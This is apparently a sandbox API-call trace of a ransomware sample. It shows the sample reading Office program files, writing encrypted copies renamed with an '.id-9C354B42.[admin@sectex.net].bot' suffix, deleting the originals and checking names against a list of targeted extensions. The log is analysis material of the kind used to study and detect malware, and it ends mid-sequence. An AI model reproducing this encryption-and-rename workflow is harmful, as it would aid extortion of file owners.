	[0165.901] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASK.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\task.cfg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0165.915] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=768) returned 1
	[0165.915] CloseHandle (hObject=0x3b8) returned 1
	[0165.915] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASK.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\task.cfg")) returned 0x20
	[0165.916] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASK.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\task.cfg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0165.918] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASK.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\task.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0165.918] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0165.918] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0165.918] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASK.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\task.cfg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0168.580] GetLastError () returned 0x0
	[0168.580] ReadFile (in: hFile=0x3ac, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x300, lpOverlapped=0x0) returned 1
	[0168.616] WriteFile (in: hFile=0x268, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x310, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x310, lpOverlapped=0x0) returned 1
	[0168.617] ReadFile (in: hFile=0x3ac, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0168.617] WriteFile (in: hFile=0x268, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xe4, lpOverlapped=0x0) returned 1
	[0168.617] SetEndOfFile (hFile=0x268) returned 1
	[0168.617] CloseHandle (hObject=0x268) returned 1
	[0168.617] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.617] SetEndOfFile (hFile=0x3ac) returned 1
	[0168.619] CloseHandle (hObject=0x3ac) returned 1
	[0168.619] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASK.CFG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0168.629] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASK.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\task.cfg")) returned 1
	[0168.668] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASK.CFG") returned 62
	[0168.668] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASK.CFG") returned 62
	[0168.668] lstrlenW (lpString=".doc") returned 4
	[0168.668] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0168.668] lstrlenW (lpString=".docx") returned 5
	[0168.668] lstrcmpiW (lpString1=".docx", lpString2="K.CFG") returned -1
	[0168.668] lstrlenW (lpString=".pdf") returned 4
	[0168.668] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0168.668] lstrlenW (lpString=".xls") returned 4
	[0168.668] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0168.669] lstrlenW (lpString=".xlsx") returned 5
	[0168.669] lstrcmpiW (lpString1=".xlsx", lpString2="K.CFG") returned -1
	[0168.669] lstrlenW (lpString=".ppt") returned 4
	[0168.669] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0168.669] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASK.CFG") returned 62
	[0168.669] lstrlenW (lpString=".zip") returned 4
	[0168.669] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0168.669] lstrlenW (lpString=".rar") returned 4
	[0168.669] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0168.669] lstrlenW (lpString=".bz2") returned 4
	[0168.669] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0168.669] lstrlenW (lpString=".7z") returned 3
	[0168.669] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0168.669] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASK.CFG") returned 62
	[0168.669] lstrlenW (lpString=".dbf") returned 4
	[0168.669] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0168.669] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASK.CFG") returned 62
	[0168.669] lstrlenW (lpString=".1cd") returned 4
	[0168.669] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0168.669] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASK.CFG") returned 62
	[0168.669] lstrlenW (lpString=".jpg") returned 4
	[0168.669] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0168.669] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASK.CFG") returned 62
	[0168.669] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASK.CFG") returned 62
	[0168.669] lstrlenW (lpString=".doc") returned 4
	[0168.669] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0168.669] lstrlenW (lpString=".docx") returned 5
	[0168.669] lstrcmpiW (lpString1=".docx", lpString2="K.CFG") returned -1
	[0168.669] lstrlenW (lpString=".pdf") returned 4
	[0168.669] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0168.669] lstrlenW (lpString=".xls") returned 4
	[0168.669] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0168.669] lstrlenW (lpString=".xlsx") returned 5
	[0168.669] lstrcmpiW (lpString1=".xlsx", lpString2="K.CFG") returned -1
	[0168.670] lstrlenW (lpString=".ppt") returned 4
	[0168.670] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0168.670] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASK.CFG") returned 62
	[0168.670] lstrlenW (lpString=".zip") returned 4
	[0168.670] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0168.670] lstrlenW (lpString=".rar") returned 4
	[0168.670] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0168.670] lstrlenW (lpString=".bz2") returned 4
	[0168.670] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0168.670] lstrlenW (lpString=".7z") returned 3
	[0168.670] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0168.670] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASK.CFG") returned 62
	[0168.670] lstrlenW (lpString=".dbf") returned 4
	[0168.670] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0168.670] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASK.CFG") returned 62
	[0168.670] lstrlenW (lpString=".1cd") returned 4
	[0168.670] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0168.670] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASK.CFG") returned 62
	[0168.670] lstrlenW (lpString=".jpg") returned 4
	[0168.670] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0168.670] lstrcmpiW (lpString1=".CFG", lpString2=".bot") returned 1
	[0168.670] lstrlenW (lpString="TASKREQ.CFG") returned 11
	[0168.670] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQ.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskreq.cfg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0168.703] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=797) returned 1
	[0168.703] CloseHandle (hObject=0x3a8) returned 1
	[0168.704] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQ.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskreq.cfg")) returned 0x20
	[0168.724] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQ.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskreq.cfg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0168.725] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQ.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskreq.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0168.725] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.725] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.725] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQ.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskreq.cfg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0168.725] GetLastError () returned 0x0
	[0168.725] ReadFile (in: hFile=0x1b4, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x31d, lpOverlapped=0x0) returned 1
	[0168.729] WriteFile (in: hFile=0x3c4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x320, lpOverlapped=0x0) returned 1
	[0168.730] ReadFile (in: hFile=0x1b4, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0168.730] WriteFile (in: hFile=0x3c4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xea, lpOverlapped=0x0) returned 1
	[0168.731] SetEndOfFile (hFile=0x3c4) returned 1
	[0168.731] CloseHandle (hObject=0x3c4) returned 1
	[0168.731] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.731] SetEndOfFile (hFile=0x1b4) returned 1
	[0168.733] CloseHandle (hObject=0x1b4) returned 1
	[0168.733] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQ.CFG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0168.733] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQ.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskreq.cfg")) returned 1
	[0168.734] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQ.CFG") returned 65
	[0168.734] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQ.CFG") returned 65
	[0168.734] lstrlenW (lpString=".doc") returned 4
	[0168.734] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0168.734] lstrlenW (lpString=".docx") returned 5
	[0168.734] lstrcmpiW (lpString1=".docx", lpString2="Q.CFG") returned -1
	[0168.734] lstrlenW (lpString=".pdf") returned 4
	[0168.734] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0168.734] lstrlenW (lpString=".xls") returned 4
	[0168.734] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0168.734] lstrlenW (lpString=".xlsx") returned 5
	[0168.734] lstrcmpiW (lpString1=".xlsx", lpString2="Q.CFG") returned -1
	[0168.734] lstrlenW (lpString=".ppt") returned 4
	[0168.734] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0168.734] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQ.CFG") returned 65
	[0168.734] lstrlenW (lpString=".zip") returned 4
	[0168.734] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0168.734] lstrlenW (lpString=".rar") returned 4
	[0168.734] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0168.734] lstrlenW (lpString=".bz2") returned 4
	[0168.734] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0168.734] lstrlenW (lpString=".7z") returned 3
	[0168.734] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0168.734] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQ.CFG") returned 65
	[0168.734] lstrlenW (lpString=".dbf") returned 4
	[0168.734] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0168.734] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQ.CFG") returned 65
	[0168.734] lstrlenW (lpString=".1cd") returned 4
	[0168.734] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0168.734] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQ.CFG") returned 65
	[0168.734] lstrlenW (lpString=".jpg") returned 4
	[0168.734] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0168.735] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQ.CFG") returned 65
	[0168.735] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQ.CFG") returned 65
	[0168.735] lstrlenW (lpString=".doc") returned 4
	[0168.735] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0168.735] lstrlenW (lpString=".docx") returned 5
	[0168.735] lstrcmpiW (lpString1=".docx", lpString2="Q.CFG") returned -1
	[0168.735] lstrlenW (lpString=".pdf") returned 4
	[0168.735] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0168.735] lstrlenW (lpString=".xls") returned 4
	[0168.735] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0168.735] lstrlenW (lpString=".xlsx") returned 5
	[0168.735] lstrcmpiW (lpString1=".xlsx", lpString2="Q.CFG") returned -1
	[0168.735] lstrlenW (lpString=".ppt") returned 4
	[0168.735] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0168.735] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQ.CFG") returned 65
	[0168.735] lstrlenW (lpString=".zip") returned 4
	[0168.735] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0168.735] lstrlenW (lpString=".rar") returned 4
	[0168.735] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0168.735] lstrlenW (lpString=".bz2") returned 4
	[0168.735] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0168.735] lstrlenW (lpString=".7z") returned 3
	[0168.735] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0168.735] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQ.CFG") returned 65
	[0168.735] lstrlenW (lpString=".dbf") returned 4
	[0168.735] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0168.735] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQ.CFG") returned 65
	[0168.735] lstrlenW (lpString=".1cd") returned 4
	[0168.735] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0168.735] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQ.CFG") returned 65
	[0168.735] lstrlenW (lpString=".jpg") returned 4
	[0168.735] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0168.736] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0168.736] lstrlenW (lpString="TASKS.ICO") returned 9
	[0168.736] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\tasks.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0168.736] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=2998) returned 1
	[0168.736] CloseHandle (hObject=0x1b4) returned 1
	[0168.736] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\tasks.ico")) returned 0x20
	[0168.736] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\tasks.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0168.737] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\tasks.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0168.737] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.737] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.737] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\tasks.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0168.737] GetLastError () returned 0x0
	[0168.737] ReadFile (in: hFile=0x1b4, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0xbb6, lpOverlapped=0x0) returned 1
	[0169.017] WriteFile (in: hFile=0x3c4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xbc0, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xbc0, lpOverlapped=0x0) returned 1
	[0169.018] ReadFile (in: hFile=0x1b4, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.018] WriteFile (in: hFile=0x3c4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0169.018] SetEndOfFile (hFile=0x3c4) returned 1
	[0169.018] CloseHandle (hObject=0x3c4) returned 1
	[0169.018] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.018] SetEndOfFile (hFile=0x1b4) returned 1
	[0169.028] CloseHandle (hObject=0x1b4) returned 1
	[0169.028] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKS.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.028] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\tasks.ico")) returned 1
	[0169.029] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKS.ICO") returned 63
	[0169.029] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKS.ICO") returned 63
	[0169.029] lstrlenW (lpString=".doc") returned 4
	[0169.029] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0169.029] lstrlenW (lpString=".docx") returned 5
	[0169.029] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0169.029] lstrlenW (lpString=".pdf") returned 4
	[0169.029] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0169.029] lstrlenW (lpString=".xls") returned 4
	[0169.029] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0169.029] lstrlenW (lpString=".xlsx") returned 5
	[0169.029] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0169.029] lstrlenW (lpString=".ppt") returned 4
	[0169.029] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0169.029] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKS.ICO") returned 63
	[0169.029] lstrlenW (lpString=".zip") returned 4
	[0169.029] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0169.029] lstrlenW (lpString=".rar") returned 4
	[0169.029] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0169.029] lstrlenW (lpString=".bz2") returned 4
	[0169.029] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0169.029] lstrlenW (lpString=".7z") returned 3
	[0169.029] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0169.029] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKS.ICO") returned 63
	[0169.029] lstrlenW (lpString=".dbf") returned 4
	[0169.029] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0169.029] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKS.ICO") returned 63
	[0169.029] lstrlenW (lpString=".1cd") returned 4
	[0169.029] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0169.029] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKS.ICO") returned 63
	[0169.029] lstrlenW (lpString=".jpg") returned 4
	[0169.029] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0169.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKS.ICO") returned 63
	[0169.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKS.ICO") returned 63
	[0169.030] lstrlenW (lpString=".doc") returned 4
	[0169.030] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0169.030] lstrlenW (lpString=".docx") returned 5
	[0169.030] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0169.030] lstrlenW (lpString=".pdf") returned 4
	[0169.030] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0169.030] lstrlenW (lpString=".xls") returned 4
	[0169.030] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0169.030] lstrlenW (lpString=".xlsx") returned 5
	[0169.030] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0169.030] lstrlenW (lpString=".ppt") returned 4
	[0169.030] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0169.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKS.ICO") returned 63
	[0169.030] lstrlenW (lpString=".zip") returned 4
	[0169.030] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0169.030] lstrlenW (lpString=".rar") returned 4
	[0169.030] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0169.030] lstrlenW (lpString=".bz2") returned 4
	[0169.030] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0169.030] lstrlenW (lpString=".7z") returned 3
	[0169.030] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0169.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKS.ICO") returned 63
	[0169.030] lstrlenW (lpString=".dbf") returned 4
	[0169.030] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0169.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKS.ICO") returned 63
	[0169.030] lstrlenW (lpString=".1cd") returned 4
	[0169.030] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0169.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKS.ICO") returned 63
	[0169.030] lstrlenW (lpString=".jpg") returned 4
	[0169.030] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0169.031] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0169.031] lstrlenW (lpString="FORM.ICO") returned 8
	[0169.031] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FORM.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\form.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
